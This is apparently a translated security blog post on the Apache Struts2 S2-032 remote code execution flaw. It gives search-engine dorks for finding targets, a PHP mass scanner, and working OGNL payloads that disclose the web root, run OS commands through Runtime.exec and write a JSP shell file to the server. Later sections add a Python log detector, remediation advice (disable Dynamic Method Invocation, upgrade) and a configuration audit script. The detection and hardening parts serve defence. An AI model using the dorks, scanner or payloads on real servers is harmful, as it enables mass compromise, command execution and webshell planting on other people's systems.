Struts2-032 Vulnerability


Search keywords:

inurl:VloginUser.action 
inurl:Mail.action 
inurl:code.action 
inurl:reg.action 
inurl:Address.action 
inurl:!Index.action 
inurl:login.action 
inurl:Add.action 
inurl:pageslist.action 
inurl:action.Action 
inurl:Message.action 
inurl:Ldap.action 
inurl:getMul.action 
inurl:shouye.action 
inurl:logout.action 
inurl:Valid.action 
inurl:search.action 
inurl:Magazine.action 
inurl:news.action 
inurl:init.action 
inurl:Page.action 
inurl:create.action 
inurl:index2.action 
inurl:default.action 
inurl:welcome.action 
inurl:Name.action 
inurl:single.action 
inurl:updateForm.action 
inurl:SysStart.action 
inurl:adminlogin.action 
inurl:Offportal.action 
inurl:Buying.action 
inurl:Success.action 
inurl:exchange.action 
inurl:menu.action 
inurl:Load.action 
inurl:airport.action 
inurl:Email.action 
inurl:On.action 
inurl:show.action 
inurl:tain.action 
inurl:Login!input.action 
inurl:randomPicture.action


Batch detection PHP script:

<?php 

/* 
Struts2-032 Scan
By:Asphxg
*/ 
error_reporting(0); 
if(empty($argv[1])){ 
  print_r(" 
+========================+ 
|   Struts2-032 Scan     | 
|    WwW.96sec.OrG       | 
|      By:Asphxg         | 
+========================+ 

->php $argv[0] url.txt 
    ");exit; 
} 

// Input file holds one URL per line; a trailing "\r" from CRLF files is removed by trim() below 
$txt = explode("\n",file_get_contents($argv[1])); 

echo "[+]$argv[1] 共 ".count($txt)." 条\r\n"; 


// Query string appended to each URL; a vulnerable target answers with its web root path only 
$poc = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8"; 

for($i = 0;$i<count($txt);$i++){ 
  if(!empty($txt[$i])){ 
    $u = trim($txt[$i]).$poc; 
    $data_str = c($u); 
    // An HTML page ("</" present) or an empty reply means the expression was not evaluated 
    if(stripos($data_str,"</") || empty($data_str)){ 
      echo trim($txt[$i])."  No \n"; 
    }else{ 
      echo trim($txt[$i])."  Yes  Path:".trim($data_str)." \n"; 
      $fp = fopen($argv[1]."_OK.txt",'a+'); 
      fwrite($fp,trim($txt[$i])."\r\n"); 
      fclose($fp); 
    } 
  } 
} 
echo "\r\n[+]ScanOk Ps:".$argv[1]."_OK.txt"; 

// Fetch a URL and return the response body as a string (15 s timeout, no headers) 
function c($url){ 
  $c = curl_init(); 
  curl_setopt($c,CURLOPT_URL,$url); 
  curl_setopt($c,CURLOPT_BINARYTRANSFER,true); 
  curl_setopt($c, CURLOPT_HEADER, 0); 
  curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)'); 
  curl_setopt($c, CURLOPT_TIMEOUT, 15); 
  curl_setopt($c, CURLOPT_REFERER, $url); 
  curl_setopt($c,CURLOPT_RETURNTRANSFER,1); 
  $data = curl_exec($c); 
  // The original placed curl_close() after return, so the handle was never released 
  curl_close($c); 
  return $data; 
} 

?>


Exploit tool:


Struts2漏洞利用工具2016版.rar (Struts2 exploit tool, 2016 edition)


PoC:

Retrieve the directory on disk: 
1. 
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8 

Execute a command: 
1. 
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=whoami&pp=\\\\A&ppp=%20&encoding=UTF-8 

2. 
method:%23_memberAccess[%23parameters.name1[0]]%3dtrue,%23_memberAccess[%23parameters.name[0]]%3dtrue,%23_memberAccess[%23parameters.name2[0]]%3d{},%23_memberAccess[%23parameters.name3[0]]%3d{},%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew%20java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&name=allowStaticMethodAccess&name1=allowPrivateAccess&name2=excludedPackageNamePatterns&name3=excludedClasses&cmd=whoami&pp=\\\\AAAA&ppp=%20&encoding=UTF-8 

Upload a file: 
1. 
method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&shellname=stest.jsp&shellContent=tttt&encoding=UTF-8&pp=%2f
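All three PoCs above share the same S2-032 shape: a query parameter whose name begins with `method:` and whose remainder is an OGNL expression instead of a plain action method name. The following Python script is an added example, not part of the original post. It parses constructed Apache combined-format access log lines, URL-decodes every `method:` parameter and flags the request when what follows the prefix is anything other than a Java identifier; the addresses, paths, timestamps and log lines are invented, and the marker list is my own choice of substrings that never belong in a legitimate method name.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format log lines (addresses, paths and timestamps are invented).
# Lines 1 and 2 carry S2-032-style OGNL in a `method:` parameter; lines 3 and 4 are normal traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2016:09:12:01 +0800] "GET /app/login.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),1?%23xx:%23request.toString&pp=%2f HTTP/1.1" 200 34 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Windows NT 5.0)"
198.51.100.3 - - [10/May/2016:09:12:05 +0800] "GET /app/login.action?method:%23_memberAccess[%23parameters.name[0]]%3dtrue,%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()),1?%23xx:%23request.toString&name=allowStaticMethodAccess&cmd=whoami HTTP/1.1" 200 12 "-" "curl/7.47.0"
192.0.2.9 - - [10/May/2016:09:13:44 +0800] "GET /app/login.action?method:doLogin&username=alice HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [10/May/2016:09:14:02 +0800] "POST /app/search.action HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Substrings that have no business in a legitimate DMI method name (my own selection).
OGNL_MARKERS = (
    "_memberAccess",
    "ognl.OgnlContext",
    "ServletActionContext",
    "#parameters",
    "java.lang.Runtime",
    "java.lang.ProcessBuilder",
    "java.io.FileWriter",
)

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) ')
JAVA_IDENT = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*$")


def parse_line(line):
    """Split one combined-format line into the fields we need; None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m.group(1), "time": m.group(2), "verb": m.group(3),
            "target": m.group(4), "status": int(m.group(5))}


def method_prefix_exprs(target):
    """Decoded text after 'method:' for every query parameter that uses the DMI prefix."""
    exprs = []
    for chunk in urlsplit(target).query.split("&"):
        decoded = unquote(chunk.replace("+", " "))
        if decoded.lower().startswith("method:"):
            exprs.append(decoded[len("method:"):])
    return exprs


def analyse(line):
    """Return a finding for an S2-032-shaped request, or None for benign lines."""
    rec = parse_line(line)
    if rec is None:
        return None
    for expr in method_prefix_exprs(rec["target"]):
        if JAVA_IDENT.match(expr):
            continue  # ordinary Dynamic Method Invocation, e.g. method:doLogin
        markers = [mk for mk in OGNL_MARKERS if mk in expr]
        is_ognl = bool(markers) or "#" in expr or "@" in expr
        rec.update(method_expr=expr, markers=markers,
                   verdict=("exploit_attempt" if is_ognl else "suspicious"))
        return rec
    return None


def scan(log_text):
    """All findings in a block of log text, in file order."""
    return [f for f in (analyse(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['verdict']} markers={f['markers']}")
```

The decode step matters: the payloads on this page arrive with `#` as `%23`, `=` as `%3d` and `@` as `%40`, so a rule that greps the raw request line for `#_memberAccess` will miss them, while a rule that matches on `%23` alone will miss a sender who mixes encodings. Decoding first and then asking whether the `method:` value is still a bare identifier catches both.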


Two remediation methods:

1. Disable Dynamic Method Invocation

Edit the Struts2 configuration file and set "struts.enable.DynamicMethodInvocation" to false, for example:

<constant name="struts.enable.DynamicMethodInvocation" value="false" />

2. Upgrade the software version

If circumstances allow, upgrade Struts to 2.3.20.2, 2.3.24.2 or 2.3.28.1; none of these versions has this vulnerability.

Upgrade download: https://struts.apache.org/download.cgi#struts23281
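As an added example that is not part of the original post, the Python audit below checks whether remediation 1 is actually in effect. It reads the effective value of struts.enable.DynamicMethodInvocation from a struts.xml and an optional struts.properties, applying later-wins precedence in the Struts loading order (struts.xml, then struts.properties) and the Struts 2.3 framework default of true when neither file sets the key. The two sample configurations are constructed, com.example.LoginAction is a placeholder, and the script does not follow <include> files, which a real audit would have to do.

```python
import re
import xml.etree.ElementTree as ET

DMI_KEY = "struts.enable.DynamicMethodInvocation"

# Constructed sample struts.xml: DMI is not set, so the Struts 2.3 default (true) applies.
STRUTS_XML_WEAK = """<?xml version="1.0" encoding="UTF-8"?>
<struts>
    <constant name="struts.devMode" value="false" />
    <package name="default" extends="struts-default">
        <action name="login" class="com.example.LoginAction">
            <result>/login.jsp</result>
        </action>
    </package>
</struts>
"""

# The same file with the page's fix applied.
STRUTS_XML_FIXED = STRUTS_XML_WEAK.replace(
    '<constant name="struts.devMode" value="false" />',
    '<constant name="struts.devMode" value="false" />\n'
    '    <constant name="%s" value="false" />' % DMI_KEY,
)

# Java properties line: key, then '=' / ':' / whitespace as separator, then value.
PROPS_RE = re.compile(r"^\s*([^=:\s]+)\s*[=:\s]\s*(.*?)\s*$")


def dmi_setting_from_xml(xml_text):
    """Value of the DMI constant in struts.xml, or None if it is not set there.
    Constants are applied in document order, so the last occurrence wins."""
    value = None
    for const in ET.fromstring(xml_text).iter("constant"):
        if const.get("name") == DMI_KEY:
            value = const.get("value")
    return value


def dmi_setting_from_properties(props_text):
    """Value of the DMI key in a struts.properties file, or None if absent."""
    value = None
    for raw in props_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":  # Java properties comment lines
            continue
        m = PROPS_RE.match(line)
        if m and m.group(1) == DMI_KEY:
            value = m.group(2)
    return value


def dmi_disabled(xml_text, props_text="", framework_default="true"):
    """True when Dynamic Method Invocation is effectively off.
    struts.properties is loaded after struts.xml and overrides it; framework_default
    is what applies when neither sets the key (true on Struts 2.3.x, which is why
    remediation 1 has to be set explicitly)."""
    value = dmi_setting_from_xml(xml_text)
    prop = dmi_setting_from_properties(props_text)
    if prop is not None:
        value = prop
    if value is None:
        value = framework_default
    return value.strip().lower() == "false"


if __name__ == "__main__":
    for label, xml in (("weak", STRUTS_XML_WEAK), ("fixed", STRUTS_XML_FIXED)):
        print(f"{label}: DMI disabled = {dmi_disabled(xml)}")
    print("weak xml + properties override:",
          dmi_disabled(STRUTS_XML_WEAK, f"{DMI_KEY}=false\n"))
```

The audit answers only the configuration half of the page's advice; it says nothing about which Struts version is deployed, so an upgrade to one of the listed fixed versions still has to be verified separately, for example against the struts2-core jar shipped in the application.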

